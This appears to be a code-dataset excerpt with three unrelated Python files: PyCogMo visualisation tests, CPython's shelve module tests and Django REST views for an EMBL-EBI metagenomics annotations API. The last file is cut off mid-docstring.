#!/usr/bin/env python2 # Copyright 2011, 2012 Alexandre Gravier (al.gravier@gmail) # This file is part of PyCogMo. # PyCogMo is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # PyCogMo is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # You should have received a copy of the GNU General Public License # along with PyCogMo. If not, see <http://www.gnu.org/licenses/>. import itertools import logging from logging import NullHandler from mock import Mock, patch import multiprocessing from nose import with_setup from nose.tools import eq_, raises, timed, nottest import ui.graphical.visualisation from ui.graphical.visualisation import * from ui.graphical.visualisation import VisualisableNetwork as VN from ui.graphical.visualisation import VisualisableNetworkStructure as VNS import vtk multiprocessing.get_logger().addHandler(NullHandler()) DUMMY_LOGGER = logging.getLogger("testLogger") DUMMY_LOGGER.addHandler(NullHandler()) V = None # holder class ("namespace") fot the test variables class Tns(object): pass def setup_vns(): global V V = VNS() def setup_units(): Tns.l_id, Tns.l_x, Tns.l_y, Tns.l_z = xrange(5, 20), xrange(3, 18), \ xrange(0, 30, 2), list(itertools.chain([None], itertools.repeat(-1, 14))) Tns.vns_units = [Unit(u_id, x, y, z) for (u_id, x, y, z) in itertools.izip(Tns.l_id, Tns.l_x, Tns.l_y, Tns.l_z)] ################################################## # Testing the VisualisableNetworkStructure class # ################################################## ### template @with_setup(setup_units) @with_setup(setup_vns) def test_VNS_(): assert False nottest(test_VNS_) ### template @with_setup(setup_units) @with_setup(setup_vns) def test_VNS___eq__(): "Equality of two VisualisableNetworkStructures." u1, u2 = Unit(1, 1, 2), Unit(2, 3, 2) V.add_population(iter(Tns.vns_units)) V.connect_units(Tns.vns_units[0], Tns.vns_units[1], -1) V.connect_units(Tns.vns_units[1], Tns.vns_units[0], 0.3) V.add_unit(u1, "bar") V.add_unit(u2, "foo") V.connect_maps("bar", "foo") w = VNS() w.add_unit(u2, "foo") w.add_population(iter(Tns.vns_units)) w.add_unit(u1, "bar") w.connect_units(Tns.vns_units[0], Tns.vns_units[1], -1) w.connect_units(Tns.vns_units[1], Tns.vns_units[0], 0.3) w.connect_maps("bar", "foo") assert V == w @with_setup(setup_units) @with_setup(setup_vns) def test_VNS_not__eq__(): "Inequality of two VisualisableNetworkStructures." u1, u2 = Unit(1, 1, 2), Unit(2, 3, 2) V.add_population(iter(Tns.vns_units)) V.connect_units(Tns.vns_units[0], Tns.vns_units[1], -1) V.connect_units(Tns.vns_units[1], Tns.vns_units[0], 0.3) V.add_unit(u1, "bar") V.add_unit(u2, "foo") V.connect_maps("bar", "foo") w = VNS() w.add_unit(u2, "foo") w.add_population(iter(Tns.vns_units)) w.add_unit(u1, "bar") w.connect_units(Tns.vns_units[0], Tns.vns_units[1], 1) # changed w.connect_units(Tns.vns_units[1], Tns.vns_units[0], 0.3) w.connect_maps("bar", "foo") x = VNS() x.add_unit(u2, "foo") x.add_population(iter(Tns.vns_units)) x.add_unit(u1, "lol") # changed x.connect_units(Tns.vns_units[0], Tns.vns_units[1], -1) x.connect_units(Tns.vns_units[1], Tns.vns_units[0], 0.3) x.connect_maps("bar", "foo") y = VNS() y.add_unit(u2, "foo") y.add_population(iter(Tns.vns_units)) y.add_unit(u1, "bar") # y.connect_units(Tns.vns_units[0], Tns.vns_units[1], -1) changed y.connect_units(Tns.vns_units[1], Tns.vns_units[0], 0.3) y.connect_maps("bar", "foo") z = VNS() z.add_unit(u2, "foo") z.add_population(iter(Tns.vns_units)) z.add_unit(u1, "bar") z.connect_units(Tns.vns_units[0], Tns.vns_units[1], -1) z.connect_units(Tns.vns_units[1], Tns.vns_units[0], 0.3) z.connect_maps("bar", "faz") # changed assert V != w assert V != x assert V != y assert V != z @with_setup(setup_units) @with_setup(setup_vns) def test_VNS_add_unit(): "add_unit is complete and correct." assert len(V.units) == 0 i = 0 for u in Tns.vns_units: V.add_unit(u) u = V.units[i] assert (u.unit_id, u.x, u.y, u.z) == (Tns.l_id[i], Tns.l_x[i], Tns.l_y[i], Tns.l_z[i]) i += 1 assert len(V.units) == len(Tns.vns_units) V.assign_unit_to_map = Mock() V.add_unit(Unit(-1, 1, 2), "bar") assert V.assign_unit_to_map.called @raises(UnitNotFoundError) @with_setup(setup_units) @with_setup(setup_vns) def test_VNS_assign_unit_to_map_raises_(): "assign_unit_to_map raises an exception on inexistent unit." V.assign_unit_to_map(Tns.vns_units[0], "foo") @with_setup(setup_units) @with_setup(setup_vns) def test_VNS_assign_unit_to_map(): "The mapping of units assignments to maps gets filled." V.add_unit(Tns.vns_units[0], "bar") V.add_unit(Tns.vns_units[1], "bar") assert V.maps["bar"] == [Tns.vns_units[0].unit_id, Tns.vns_units[1].unit_id] @with_setup(setup_units) @with_setup(setup_vns) def test_VNS_add_population(): "add_population completeness and correctness." V.add_population(iter(Tns.vns_units)) assert set(V.units) == set(Tns.vns_units) @raises(UnitNotFoundError) @with_setup(setup_units) @with_setup(setup_vns) def test_VNS_connect_units_inexistent_id(): "connect_units with inexistent units raises UnitNotFoundError." V.connect_units(Tns.vns_units[0].unit_id, Tns.vns_units[1].unit_id, 1) @raises(UnitNotFoundError) @with_setup(setup_units) @with_setup(setup_vns) def test_VNS_connect_units_inexistent_unit(): "connect_units with inexistent units raises UnitNotFoundError." V.connect_units(Tns.vns_units[0], Tns.vns_units[1], 1) @raises(WeightOutOfRangeError) @with_setup(setup_units) @with_setup(setup_vns) def test_VNS_connect_units_wrong_weight(): "connect_units with incorrect weight raises WeightOutOfRangeError." V.add_population(iter(Tns.vns_units)) V.connect_units(Tns.vns_units[0], Tns.vns_units[1], 2) @with_setup(setup_units) @with_setup(setup_vns) def test_VNS_connect_units(): "connect_units correctly modifies units_conn." V.add_population(iter(Tns.vns_units)) V.connect_units(Tns.vns_units[0], Tns.vns_units[1], -1) V.connect_units(Tns.vns_units[1], Tns.vns_units[0], 0.3) id0, id1 = Tns.vns_units[0].unit_id, Tns.vns_units[1].unit_id assert set(V.units_conn) == set([(id0, id1, -1), (id1, id0, 0.3)]) @with_setup(setup_units) @with_setup(setup_vns) def test_VNS_connect_units_list(): "connect_units_list correctly modifies units_conn." V.connect_units = Mock() V.add_population(iter(Tns.vns_units)) c_l = itertools.izip([Tns.l_id, reversed(Tns.l_id), itertools.repeat(1)]) V.connect_units_list(c_l) assert set(c_l) == set(V.units_conn) @with_setup(setup_units) @with_setup(setup_vns) def test_VNS_connect_maps(): "connect_maps correctly modifies maps_conn." V.add_unit(Unit(1, 1, 2), "bar") V.add_unit(Unit(2, 3, 2), "foo") V.connect_maps("bar", "foo") assert V.maps_conn == [("bar", "foo")] ####################### # VisualisableNetwork # ####################### def setup_vn(): setup_vns() Tns.p1_l_id, Tns.p1_l_x, Tns.p1_l_y, Tns.p1_l_z = range(0, 15*15), range(3, 18)*15, \ range(0,30,2)*15, itertools.repeat(-1,15*15); Tns.p1_l_y.sort() Tns.p1_vns_units = [Unit(u_id, x, y, z) for (u_id, x, y, z) in itertools.izip(Tns.p1_l_id, Tns.p1_l_x, Tns.p1_l_y, Tns.p1_l_z)] it = iter(Tns.p1_vns_units) V.add_population(it, "pop") Tns.p2_l_id, Tns.p2_l_x, Tns.p2_l_y, Tns.p2_l_z = range(15*15+3, 15*15*2+3), range(0, 15)*15, \ range(0,30,2)*15, itertools.repeat(0,15*15); Tns.p2_l_y.sort() Tns.p2_vns_units = [Unit(u_id, x, y, z) for (u_id, x, y, z) in itertools.izip(Tns.p2_l_id, Tns.p2_l_x, Tns.p2_l_y, Tns.p2_l_z)] it2 = iter(Tns.p2_vns_units) V.add_population(it2, "pop2") V.connect_units(Tns.p1_vns_units[0], Tns.p2_vns_units[1], -1) V.connect_units(Tns.p1_vns_units[1], Tns.p2_vns_units[0], 0.3) Tns.vn = VisualisableNetwork(V) def main(): setup_vn() aPolyVertexGrid1 = Tns.vn.represent_map("pop")[0] Tns.vn.update_scalars([a/20. for a in Tns.p1_l_x], [aPolyVertexGrid1], [len(Tns.p1_l_id)]) aPolyVertexGrid2 = Tns.vn.represent_map("pop2")[0] # aPolyVertexActor = Tns.vn.make_actor_for_grid(aPolyVertexGrid) # aPolyVertexActor2 = Tns.vn.make_actor_for_grid(aPolyVertexGrid2) lvl_to_g = {0:[aPolyVertexGrid1, aPolyVertexGrid2]} #lvl_to_g = Tns.vn.levels_to_grids() all_actors = Tns.vn.make_all_actors(lvl_to_g) # Create the usual rendering stuff. ren = vtk.vtkRenderer() renWin = vtk.vtkRenderWindow() renWin.AddRenderer(ren) renWin.SetSize(1024, 768) iren = vtk.vtkRenderWindowInteractor() iren.SetRenderWindow(renWin) ren.SetBackground(.0, .0, .0) for a in all_actors: ren.AddActor(a) ren.ResetCamera() ren.GetActiveCamera().Azimuth(00) ren.GetActiveCamera().Elevation(-40) ren.GetActiveCamera().Dolly(0) ren.ResetCameraClippingRange() # Render the scene and start interaction. iren.Initialize() renWin.Render() import time time.sleep(0.1) iren.Start() if __name__ == "__main__": main() ########################### # general setup functions # ########################### def setup_child_conn_and_callback(): Tns.parent_conn, Tns.child_conn = multiprocessing.Pipe() Tns.vtc = vtkTimerCallback(Tns.child_conn) def setup_patch_visualisation_functions(): Tns.setup_vis_patch = \ patch("ui.graphical.visualisation.setup_visualisation") Tns.add_actors_patch = \ patch("ui.graphical.visualisation.add_actors_to_scene") Tns.prepare_env_patch = \ patch("ui.graphical.visualisation.prepare_render_env") Tns.setup_timer_patch = \ patch("ui.graphical.visualisation.setup_timer") Tns.setup_vis_mock = Tns.setup_vis_patch.start() Tns.setup_vis_mock.return_value = (Mock(), Mock(), Mock()) Tns.add_actors_mock = Tns.add_actors_patch.start() Tns.prepare_env_mock = Tns.prepare_env_patch.start() Tns.setup_timer_mock = Tns.setup_timer_patch.start() def teardown_patch_visualisation_functions(): Tns.setup_vis_patch.stop() Tns.setup_vis_mock = None Tns.add_actors_patch.stop() Tns.add_actors_mock = None Tns.prepare_env_patch.stop() Tns.prepare_env_mock = None Tns.setup_timer_patch.stop() Tns.setup_timer_mock = None @timed(1) @with_setup(setup_child_conn_and_callback) def test_vtkTimerCallback_execute_does_not_block(): "vtkTimerCallback.execute doesn't block on empty pipe." p = multiprocessing.Process( target=Tns.vtc.execute, args=(Mock(), Mock())) p.start() p.join(2) @with_setup(setup_patch_visualisation_functions, teardown_patch_visualisation_functions) def test_visualisation_process_f_side_effects(): """The process initialization function calls all setup functions.""" global LOGGER mock_pipe, mock_logger = Mock(), Mock() visualisation_process_f(mock_pipe, mock_logger) ui.graphical.visualisation.setup_timer = Mock(return_value=1) assert Tns.setup_vis_mock.called assert ui.graphical.visualisation.LOGGER is mock_logger assert Tns.setup_timer_mock.called def test_setup_visualisation(): """Return values are renderer, window and interactor linked together.""" r, w, i = setup_visualisation() assert isinstance(r, vtk.vtkRenderer) assert isinstance(w, vtk.vtkRenderWindow) assert isinstance(i, vtk.vtkRenderWindowInteractor) assert r is w.GetRenderers().GetFirstRenderer() assert w is i.GetRenderWindow() def test_map_source_object(): "Returns actor -> mapper -> object." obj = vtk.vtkPointSource() m, a = map_source_object(obj) assert isinstance(m.GetInput(), vtk.vtkObject) assert m is a.GetMapper() def test_add_actors_to_scene(): "add_actors_to_scene calls renderer.AddActor for all actors." r = Mock() r.AddActor = Mock(spec=vtk.vtkRenderer.AddActor) add_actors_to_scene(r, [1]) r.AddActor.assert_called_with(1) r = Mock() add_actors_to_scene(r, [2, 3, 4]) assert r.method_calls == [("AddActor", (2,)), ("AddActor", (3,)), ("AddActor", (4,))] def test_prepare_render_env(): "prepare_render_env calls interactor.Initialize and win.Render." m = Mock() prepare_render_env(m, m) assert m.Initialize.called assert m.Render.called def test_setup_timer(): vtkTimerCallback_patch = \ patch("ui.graphical.visualisation.vtkTimerCallback") vtkTimerCallback_mock = vtkTimerCallback_patch.start() mock_wi, mock_ic, mock_callback = Mock(), Mock(), Mock() vtkTimerCallback_mock.return_value = mock_callback setup_timer(mock_wi, mock_ic) vtkTimerCallback_patch.stop() assert vtkTimerCallback_mock.call_args == ((mock_ic,),) assert mock_wi.method_calls[0] == ("AddObserver", ("TimerEvent", mock_callback.execute), {}) assert mock_wi.method_calls[1][0] == "CreateRepeatingTimer" ####################################### # Network structure drawing functions # ####################################### # Template @with_setup() def test_(): assert False nottest(test_) # Template # TODO
gpl-3.0
MattsFleaMarket/python-for-android
python3-alpha/python3-src/Lib/test/test_shelve.py
57
5834
import unittest import shelve import glob from test import support from collections import MutableMapping from test.test_dbm import dbm_iterator def L1(s): return s.decode("latin-1") class byteskeydict(MutableMapping): "Mapping that supports bytes keys" def __init__(self): self.d = {} def __getitem__(self, key): return self.d[L1(key)] def __setitem__(self, key, value): self.d[L1(key)] = value def __delitem__(self, key): del self.d[L1(key)] def __len__(self): return len(self.d) def iterkeys(self): for k in self.d.keys(): yield k.encode("latin-1") __iter__ = iterkeys def keys(self): return list(self.iterkeys()) def copy(self): return byteskeydict(self.d) class TestCase(unittest.TestCase): fn = "shelftemp.db" def tearDown(self): for f in glob.glob(self.fn+"*"): support.unlink(f) def test_close(self): d1 = {} s = shelve.Shelf(d1, protocol=2, writeback=False) s['key1'] = [1,2,3,4] self.assertEqual(s['key1'], [1,2,3,4]) self.assertEqual(len(s), 1) s.close() self.assertRaises(ValueError, len, s) try: s['key1'] except ValueError: pass else: self.fail('Closed shelf should not find a key') def test_ascii_file_shelf(self): s = shelve.open(self.fn, protocol=0) try: s['key1'] = (1,2,3,4) self.assertEqual(s['key1'], (1,2,3,4)) finally: s.close() def test_binary_file_shelf(self): s = shelve.open(self.fn, protocol=1) try: s['key1'] = (1,2,3,4) self.assertEqual(s['key1'], (1,2,3,4)) finally: s.close() def test_proto2_file_shelf(self): s = shelve.open(self.fn, protocol=2) try: s['key1'] = (1,2,3,4) self.assertEqual(s['key1'], (1,2,3,4)) finally: s.close() def test_in_memory_shelf(self): d1 = byteskeydict() s = shelve.Shelf(d1, protocol=0) s['key1'] = (1,2,3,4) self.assertEqual(s['key1'], (1,2,3,4)) s.close() d2 = byteskeydict() s = shelve.Shelf(d2, protocol=1) s['key1'] = (1,2,3,4) self.assertEqual(s['key1'], (1,2,3,4)) s.close() self.assertEqual(len(d1), 1) self.assertEqual(len(d2), 1) self.assertNotEqual(d1.items(), d2.items()) def test_mutable_entry(self): d1 = byteskeydict() s = shelve.Shelf(d1, protocol=2, writeback=False) s['key1'] = [1,2,3,4] self.assertEqual(s['key1'], [1,2,3,4]) s['key1'].append(5) self.assertEqual(s['key1'], [1,2,3,4]) s.close() d2 = byteskeydict() s = shelve.Shelf(d2, protocol=2, writeback=True) s['key1'] = [1,2,3,4] self.assertEqual(s['key1'], [1,2,3,4]) s['key1'].append(5) self.assertEqual(s['key1'], [1,2,3,4,5]) s.close() self.assertEqual(len(d1), 1) self.assertEqual(len(d2), 1) def test_keyencoding(self): d = {} key = 'Pöp' # the default keyencoding is utf-8 shelve.Shelf(d)[key] = [1] self.assertIn(key.encode('utf-8'), d) # but a different one can be given shelve.Shelf(d, keyencoding='latin1')[key] = [1] self.assertIn(key.encode('latin1'), d) # with all consequences s = shelve.Shelf(d, keyencoding='ascii') self.assertRaises(UnicodeEncodeError, s.__setitem__, key, [1]) def test_writeback_also_writes_immediately(self): # Issue 5754 d = {} key = 'key' encodedkey = key.encode('utf-8') s = shelve.Shelf(d, writeback=True) s[key] = [1] p1 = d[encodedkey] # Will give a KeyError if backing store not updated s['key'].append(2) s.close() p2 = d[encodedkey] self.assertNotEqual(p1, p2) # Write creates new object in store from test import mapping_tests class TestShelveBase(mapping_tests.BasicTestMappingProtocol): fn = "shelftemp.db" counter = 0 def __init__(self, *args, **kw): self._db = [] mapping_tests.BasicTestMappingProtocol.__init__(self, *args, **kw) type2test = shelve.Shelf def _reference(self): return {"key1":"value1", "key2":2, "key3":(1,2,3)} def _empty_mapping(self): if self._in_mem: x= shelve.Shelf(byteskeydict(), **self._args) else: self.counter+=1 x= shelve.open(self.fn+str(self.counter), **self._args) self._db.append(x) return x def tearDown(self): for db in self._db: db.close() self._db = [] if not self._in_mem: for f in glob.glob(self.fn+"*"): support.unlink(f) class TestAsciiFileShelve(TestShelveBase): _args={'protocol':0} _in_mem = False class TestBinaryFileShelve(TestShelveBase): _args={'protocol':1} _in_mem = False class TestProto2FileShelve(TestShelveBase): _args={'protocol':2} _in_mem = False class TestAsciiMemShelve(TestShelveBase): _args={'protocol':0} _in_mem = True class TestBinaryMemShelve(TestShelveBase): _args={'protocol':1} _in_mem = True class TestProto2MemShelve(TestShelveBase): _args={'protocol':2} _in_mem = True def test_main(): for module in dbm_iterator(): support.run_unittest( TestAsciiFileShelve, TestBinaryFileShelve, TestProto2FileShelve, TestAsciiMemShelve, TestBinaryMemShelve, TestProto2MemShelve, TestCase ) if __name__ == "__main__": test_main()
apache-2.0
EBI-Metagenomics/emgapi
emgapianns/views.py
1
33502
#!/usr/bin/env python # -*- coding: utf-8 -*- # Copyright 2019 EMBL - European Bioinformatics Institute # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import os import io import logging import urllib import pysam from django.conf import settings from django.db.models import Q from mongoengine.queryset.visitor import Q as M_Q from django.http import Http404, HttpResponse from django.shortcuts import get_object_or_404 from django_filters.rest_framework import DjangoFilterBackend from rest_framework import filters from rest_framework.decorators import action from rest_framework.views import APIView from rest_framework.response import Response from rest_framework.settings import api_settings from rest_framework import viewsets, status from rest_framework.exceptions import NotFound from rest_framework.pagination import CursorPagination from mongoengine.base.datastructures import EmbeddedDocumentList from emgapi import serializers as emg_serializers from emgapi import models as emg_models from emgapi import filters as emg_filters from emgapi import utils as emg_utils from . import serializers as m_serializers from . import models as m_models from . import pagination as m_pagination from . import viewsets as m_viewsets from . import mixins as m_mixins logger = logging.getLogger(__name__) class GoTermViewSet(m_mixins.AnnotationRetrivalMixin, m_viewsets.ReadOnlyModelViewSet): """ Provides list of GO terms. """ annotation_model = m_models.GoTerm serializer_class = m_serializers.GoTermSerializer lookup_field = 'accession' lookup_value_regex = 'GO:[0-9]+' def get_serializer_class(self): return super(GoTermViewSet, self).get_serializer_class() def list(self, request, *args, **kwargs): """ Retrieves list of GO terms Example: --- `/annotations/go-terms` """ return super(GoTermViewSet, self) \ .list(request, *args, **kwargs) def retrieve(self, request, *args, **kwargs): """ Retrieves GO term Example: --- `/annotations/go-terms/GO:009579` """ return super(GoTermViewSet, self) \ .retrieve(request, *args, **kwargs) class InterproIdentifierViewSet(m_mixins.AnnotationRetrivalMixin, m_viewsets.ReadOnlyModelViewSet): """ Provides list of InterPro identifiers. """ annotation_model = m_models.InterproIdentifier serializer_class = m_serializers.InterproIdentifierSerializer lookup_field = 'accession' lookup_value_regex = 'IPR[0-9]+' def get_serializer_class(self): return super(InterproIdentifierViewSet, self).get_serializer_class() def list(self, request, *args, **kwargs): """ Retrieves list of InterPro identifier Example: --- `/annotations/interpro-identifier` """ return super(InterproIdentifierViewSet, self) \ .list(request, *args, **kwargs) def retrieve(self, request, *args, **kwargs): """ Retrieves InterPro identifier Example: --- `/annotations/interpro-identifier/IPR020405` """ return super(InterproIdentifierViewSet, self) \ .retrieve(request, *args, **kwargs) class KeggModuleViewSet(m_mixins.AnnotationRetrivalMixin, m_viewsets.ReadOnlyModelViewSet): """ Provides list of KEEG modules. """ annotation_model = m_models.KeggModule serializer_class = m_serializers.KeggModuleSerializer lookup_field = 'accession' lookup_value_regex = 'M[0-9]+' def get_serializer_class(self): return super(KeggModuleViewSet, self).get_serializer_class() def list(self, request, *args, **kwargs): """ Retrieves list of KEGG modules Example: --- `/annotations/kegg-modules` """ return super(KeggModuleViewSet, self) \ .list(request, *args, **kwargs) def retrieve(self, request, *args, **kwargs): """ Retrieves KEGG module Example: --- `/annotations/kegg-modules/M00127` """ return super(KeggModuleViewSet, self) \ .retrieve(request, *args, **kwargs) class PfamEntryViewSet(m_mixins.AnnotationRetrivalMixin, m_viewsets.ReadOnlyModelViewSet): """ Provides list of Pfem entries. """ annotation_model = m_models.PfamEntry serializer_class = m_serializers.PfamSerializer lookup_field = 'accession' lookup_value_regex = 'PF[0-9]+' def get_serializer_class(self): return super(PfamEntryViewSet, self).get_serializer_class() def list(self, request, *args, **kwargs): """ Retrieves list of Pfam entries Example: --- `/annotations/pfam-entries` """ return super(PfamEntryViewSet, self) \ .list(request, *args, **kwargs) def retrieve(self, request, *args, **kwargs): """ Retrieves a Pfram entry Example: --- `/annotations/pfam-entry/P0001` """ return super(PfamEntryViewSet, self) \ .retrieve(request, *args, **kwargs) class KeggOrthologViewSet(m_mixins.AnnotationRetrivalMixin, m_viewsets.ReadOnlyModelViewSet): """ Provides list of KEGG Ortholog. """ annotation_model = m_models.KeggOrtholog serializer_class = m_serializers.KeggOrthologSerializer lookup_field = 'accession' lookup_value_regex = 'K[0-9]+' def get_serializer_class(self): return super(KeggOrthologViewSet, self).get_serializer_class() def list(self, request, *args, **kwargs): """ Retrieves list of KO Example: --- `/annotations/ko` """ return super(KeggOrthologViewSet, self) \ .list(request, *args, **kwargs) def retrieve(self, request, *args, **kwargs): """ Retrieves a Kegg Ortholog Example: --- `/annotations/ko/ko00001` """ return super(KeggOrthologViewSet, self) \ .retrieve(request, *args, **kwargs) class GenomePropViewSet(m_mixins.AnnotationRetrivalMixin, m_viewsets.ReadOnlyModelViewSet): """ Provides list of Genome Properties. """ annotation_model = m_models.GenomeProperty serializer_class = m_serializers.GenomePropertySerializer lookup_field = 'accession' lookup_value_regex = 'GenProp[0-9]+' def get_serializer_class(self): return super(GenomePropViewSet, self).get_serializer_class() def list(self, request, *args, **kwargs): """ Retrieves list of Genome properties Example: --- `/annotations/genome-properties` """ return super(GenomePropViewSet, self) \ .list(request, *args, **kwargs) def retrieve(self, request, *args, **kwargs): """ Retrieves a Genome property Example: --- `/annotations/genome-properties/GenProp0063` """ return super(GenomePropViewSet, self) \ .retrieve(request, *args, **kwargs) class AntiSmashGeneClusterViewSet(m_mixins.AnnotationRetrivalMixin, m_viewsets.ReadOnlyModelViewSet): """Provides list of antiSMASH gene clusters. """ annotation_model = m_models.AntiSmashGeneCluster serializer_class = m_serializers.AntiSmashGeneClusterSerializer lookup_field = 'accession' lookup_value_regex = '.*' def get_serializer_class(self): return super().get_serializer_class() def list(self, request, *args, **kwargs): """ Retrieves list of antiSMASH gene clusters Example: --- `/annotations/antismash-gene-clusters` """ return super().list(request, *args, **kwargs) def retrieve(self, request, *args, **kwargs): """ Retrieves an antiSMASH gene cluster Example: --- `/annotations/antismash-gene-clusters/terpene` """ return super().retrieve(request, *args, **kwargs) # FIXME: None of the RelationshipViewSet are working, on Master either... class GoTermAnalysisRelationshipViewSet(m_viewsets.AnalysisRelationshipViewSet): """ Retrieves list of analysis results for the given GO term Example: --- `/annotations/go-terms/GO:009579/analyses` """ annotation_model = m_models.GoTerm def get_job_ids(self, annotation): job_ids = m_models.AnalysisJobGoTerm.objects \ .filter( M_Q(go_slim__go_term=annotation) | M_Q(go_terms__go_term=annotation) ) \ .distinct('job_id') return job_ids class InterproIdentifierAnalysisRelationshipViewSet(m_viewsets.AnalysisRelationshipViewSet): """ Retrieves list of analysis results for the given InterPro identifier Example: --- `/annotations/interpro-identifier/IPR020405/analyses` """ annotation_model = m_models.InterproIdentifier def get_job_ids(self, annotation): return m_models.AnalysisJobInterproIdentifier.objects \ .filter(M_Q(interpro_identifiers__interpro_identifier=annotation)) \ .distinct('job_id') class KeggModuleAnalysisRelationshipViewSet(m_viewsets.AnalysisRelationshipViewSet): """ Retrieves list of analysis results for the given KEGG module M00127 term Example: --- `/annotations/kegg-modules/M00127/analyses` """ annotation_model = m_models.KeggModule def get_job_ids(self, annotation): return m_models.AnalysisJobKeggModule.objects \ .filter(M_Q(kegg_modules__module=annotation)) \ .distinct('job_id') class PfamAnalysisRelationshipViewSet(m_viewsets.AnalysisRelationshipViewSet): """ Retrieves list of analysis results for the given Pfam entey P00001 term Example: --- `/annotations/pfram-entries/P00001/analyses` """ annotation_model = m_models.AnalysisJobPfamAnnotation def get_job_ids(self, annotation): return m_models.AnalysisJobPfam.objects \ .filter(M_Q(pfam_entries__pfam=annotation)) \ .distinct('job_id') class GenomePropertyAnalysisRelationshipViewSet(m_viewsets.AnalysisRelationshipViewSet): """ Retrieves list of analysis results for the given antiSMASH gene cluster term Example: --- `/annotations/genome-properties/GenProp0017` """ annotation_model = m_models.GenomeProperty def get_job_ids(self, annotation): return m_models.AnalysisJobGenomeProperty.objects \ .filter(M_Q(genome_properties__genome_property=annotation)) \ .distinct('job_id') class AntiSmashGeneClusterAnalysisRelationshipViewSet(m_viewsets.AnalysisRelationshipViewSet): """Retrieves list of analysis results for the given Genome Property term Example: --- `/annotations/GenProp0063/analyses` """ annotation_model = m_models.AntiSmashGeneCluster def get_job_ids(self, annotation): return m_models.AnalysisJobAntiSmashGeneCluser.objects \ .filter(M_Q(antismash_gene_clusters__gene_cluster=annotation)) \ .distinct('job_id') class KeggOrthologRelationshipViewSet(m_viewsets.AnalysisRelationshipViewSet): """ Retrieves list of analysis results for the given Kegg Ortholog Example: --- `/annotations/kos/ko00001/analyses` """ annotation_model = m_models.KeggOrtholog def get_job_ids(self, annotation): return m_models.AnalysisJobKeggOrtholog.objects \ .filter(M_Q(ko_entries__ko=annotation)) \ .distinct('job_id') class AnalysisGoTermRelationshipViewSet(m_mixins.AnalysisJobAnnotationMixin, m_viewsets.ListReadOnlyModelViewSet): """ Retrieves GO terms for the given accession Example: --- `/analyses/MGYA00102827/go-terms` """ serializer_class = m_serializers.GoTermRetriveSerializer pagination_class = m_pagination.MaxSetPagination lookup_field = 'accession' annotation_model = m_models.AnalysisJobGoTerm annotation_model_property = 'go_terms' analysis_job_filters = ~Q(experiment_type__experiment_type='amplicon') class AnalysisGoSlimRelationshipViewSet(m_mixins.AnalysisJobAnnotationMixin, m_viewsets.ListReadOnlyModelViewSet): """ Retrieves GO slim for the given accession Example: --- `/analyses/MGYA00102827/go-slim` """ serializer_class = m_serializers.GoTermRetriveSerializer pagination_class = m_pagination.MaxSetPagination lookup_field = 'accession' annotation_model = m_models.AnalysisJobGoTerm annotation_model_property = 'go_slim' analysis_job_filters = ~Q(experiment_type__experiment_type='amplicon') class AnalysisInterproIdentifierRelationshipViewSet( # NOQA m_mixins.AnalysisJobAnnotationMixin, m_viewsets.ListReadOnlyModelViewSet): """ Retrieves InterPro identifiers for the given accession Example: --- `/analyses/MGYA00102827/interpro-identifiers` """ serializer_class = m_serializers.InterproIdentifierRetriveSerializer pagination_class = m_pagination.MaxSetPagination lookup_field = 'accession' annotation_model = m_models.AnalysisJobInterproIdentifier annotation_model_property = 'interpro_identifiers' analysis_job_filters = ~Q(experiment_type__experiment_type='amplicon') class AnalysisPfamRelationshipViewSet( # NOQA m_mixins.AnalysisJobAnnotationMixin, m_viewsets.ListReadOnlyModelViewSet): """ Retrieves Pfam entries for the given accession Example: --- `/analyses/MGYA00102827/pfam-entries` """ serializer_class = m_serializers.PfamRetrieveSerializer pagination_class = m_pagination.MaxSetPagination lookup_field = 'accession' annotation_model = m_models.AnalysisJobPfam annotation_model_property = 'pfam_entries' class AnalysisKeggModulesRelationshipViewSet( # NOQA m_mixins.AnalysisJobAnnotationMixin, m_viewsets.ListReadOnlyModelViewSet): """ Retrieves KEGG Module for the given accession Example: --- `/analyses/MGYA00102827/kegg-modules` """ serializer_class = m_serializers.KeggModuleRetrieveSerializer pagination_class = m_pagination.MaxSetPagination lookup_field = 'accession' annotation_model = m_models.AnalysisJobKeggModule annotation_model_property = 'kegg_modules' class AnalysisKeggOrthologsRelationshipViewSet( # NOQA m_mixins.AnalysisJobAnnotationMixin, m_viewsets.ListReadOnlyModelViewSet): """ Retrieves Kegg Orthologs for the given accession Example: --- /analyses/MGYA00102827/kegg-orthologs """ serializer_class = m_serializers.KeggOrthologRetrieveSerializer pagination_class = m_pagination.MaxSetPagination lookup_field = 'accession' annotation_model = m_models.AnalysisJobKeggOrtholog annotation_model_property = 'ko_entries' class AnalysisGenomePropertiesRelationshipViewSet( # NOQA m_mixins.AnalysisJobAnnotationMixin, m_viewsets.ListReadOnlyModelViewSet): """ Retrieves GenomeProperties for the given accession Example: --- `/analyses/MGYA00102827/genome-properties` """ serializer_class = m_serializers.GenomePropertyRetrieveSerializer pagination_class = m_pagination.MaxSetPagination lookup_field = 'accession' annotation_model = m_models.AnalysisJobGenomeProperty annotation_model_property = 'genome_properties' class AnalysisAntiSmashGeneClustersRelationshipViewSet(m_mixins.AnalysisJobAnnotationMixin, m_viewsets.ListReadOnlyModelViewSet): """Retrieves the antiSMASH gene clusters for the given accession Example: --- `/analyses/MGYA00102827/antismash-gene-clusters` """ serializer_class = m_serializers.AntiSmashGeneClusterRetrieveSerializer pagination_class = m_pagination.MaxSetPagination lookup_field = 'accession' annotation_model = m_models.AnalysisJobAntiSmashGeneCluser annotation_model_property = 'antismash_gene_clusters' class OrganismViewSet(m_viewsets.ListReadOnlyModelViewSet): """ Provides list of Organisms. """ serializer_class = m_serializers.OrganismSerializer filter_backends = ( filters.OrderingFilter, ) ordering_fields = ( 'name', 'prefix', 'lineage', ) lookup_field = 'lineage' lookup_value_regex = '.*' def get_queryset(self): return m_models.Organism.objects.all() def get_serializer_class(self): return super(OrganismViewSet, self).get_serializer_class() def list(self, request, *args, **kwargs): """ Retrieves list of Organisms 